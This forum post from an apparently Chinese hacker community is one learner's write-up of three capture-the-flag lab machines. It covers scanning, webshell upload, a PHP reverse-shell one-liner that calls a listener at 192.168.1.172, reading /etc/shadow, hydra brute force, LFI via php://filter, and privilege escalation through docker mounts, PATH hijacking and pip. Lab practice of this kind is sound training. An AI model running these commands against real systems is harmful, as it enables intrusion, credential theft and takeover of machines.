• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

三个靶机让我学到了什么


Guest

Recommended Posts

这三天分别日穿了三个靶机,分别是HcakINos、me_and_my_girlfriend(被绿了)、wakanda,这三个还是比较像的,都是通过web端的应用入手的,不外乎博客商城之类的。

第一个靶机:

  • 首先是,都有的要用nmap深入扫面,命令我实在是记不住,常用的大概是-A还有-sV、-sU,剩下的我选择翻手册查喽
  • 然后,扫到的是一个wordpress,一个博客,有专门的wpscan,可以扫一波,鬼知道能不能扫出来啥,但是试试是一定要的
  • 然后呢,日常仔细的观察页面,并且审查源码,找突破口,注意网页加载的参数
  • 日常的使用dirbuster爆破目录,看看能不能找到什么
  • 一个网页的robots.txt是比较重要的,要看看里面是啥
  • 这里看到了upload,网页又是PHP的语言,所以想着上传PHP马拿shell,同时学到了一种上传文件的验证方式,验证文件头就可以迷惑上传(有后门的图片啥的)
  • msfvenom生成payload,msfconsole可以接收shell,然后就是日常准备工作开始提权
  • 但是哈,这个应该注意,word press吧有个wp-admin.php,可以看到网站的配置信息,这个很重要,有数据库的信息的
  • 这里很特殊,网站放在docker中(根据sys info的主机名看出来的),在msfconsole中,这个run post/linux/gather/checkcontainer这个代码可以确认是不是容器
  • 进去以后,sysinfo,whoami,sudo -l,id,先看看环境,然后这里还有个提权之前的扫面环境的脚本linuxprivchecker.py,这个在GitHub上有,它可以看具有suid的指令,然后就可以考虑局部特权
  • tail 看/etc/shadow文件,可以看到hash密码,爆破是思路一,有时候的确可行
  • 然后是,模拟终端,使用python -c "import pty;pty.spawn('/bin/bash');"
  • 利用刚才的配置文件,进入MySQL数据库查找有用的资料
  • ls -lh $(find / -perm -u=s -type f 2>/dev/null)可以找SUID可以执行的指令
  • 命令劫持提权,没搞懂原理呢还,在这道题里,的确是一种方法,需要看到$PATH是否给我们这个便利,如果在普通用户名下有bin文件路径,那就奈斯了
  • docker有挂载,因此可以直接提权到root,使用docker run -v参数就OK,直接把root目录挂载进来
  • 这里补充一个东西,.git泄露漏洞,就是利用.git反编译出来原来的东西,也是个突破口!!!!https://github.com/lijiejie/GitHack里面有具体的应用

第二个靶机:

  • X-Forward-For头部,这个涉及到了HTTP头的知识,它可以用来指向源IP,也就是帮助代理转发找到真实的请求IP,这道题里用来伪装
  • hydra的使用,强大的密码破解工具,可以是之破解账号也可以只破解密码,也可以同时尝试用户名密码登录,具体参数我选择百度查
  • PHP一句话反弹shell,sudo /usr/bin/php -r '$sock=fsockopen("192.168.1.172",10086);exec("/bin/bash -i <&3 >&3 2>&3");',直接回弹root权限,奈斯
  • 同时,Kali中自带一个反弹shell的目录,在/usr/share/webshells中,然后传到肉鸡上就可以回弹了
  • 这里学到了,可以利用python -m SimpleHTTPServer _port_number_来搭建一个简单的服务器,肉鸡可以wget(注意指定端口号)

第三个靶机:

  • nmap这玩意,卧槽了,真的吊,功能太多了,只能百度慢慢学了
  • Nikto可以扫描网站的漏洞,没事可以直接走一波,有益无害,万一扫出来个啥呢
  • 新知识,本地文件包含还有远程文件包含漏洞(RFI和LFI),这个百度了,原来没见过,这里也不知道为啥是可以想到,问问师父去
  • 然后,这里又见到了LFI和RFI中的所谓的php伪协议,可以利用它读取文件内容,尤其是这个filter(php://filter)这个东西,不需要有任何特定的配置,就可以直接读取,一般是php://filter/read=convert.base64-encode/resourse=,直接读出来base64加密的文件,在解密就很奈斯,可以读取一些有用的东西
  • cat /etc/passwd,很有用的命令,可以看看有没有别的用户啥的,然后,/home去看看也行的
  • 做靶机渗透的题目,一般都会有突破口的,在一些目录里多翻一番,会找到意想不到的东西,这里竟然看到了一个每隔五分钟创建一次的文档,所以一定是有个进程存在的
  • 所以,以后进去以后,ps -aux查一下也行,先看看有啥突破口没有
  • python一句话反弹shell,get
  • pip漏洞提权,,真他妈神了,什么玩意都能提权了https://github.com/0x00-0x00/FakePip在这里也有很详细的解释应用,真的牛逼!

至此呢,这三天见识到的新东西就总结到位了,以后慢慢来,会的就会越来越多的!!

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now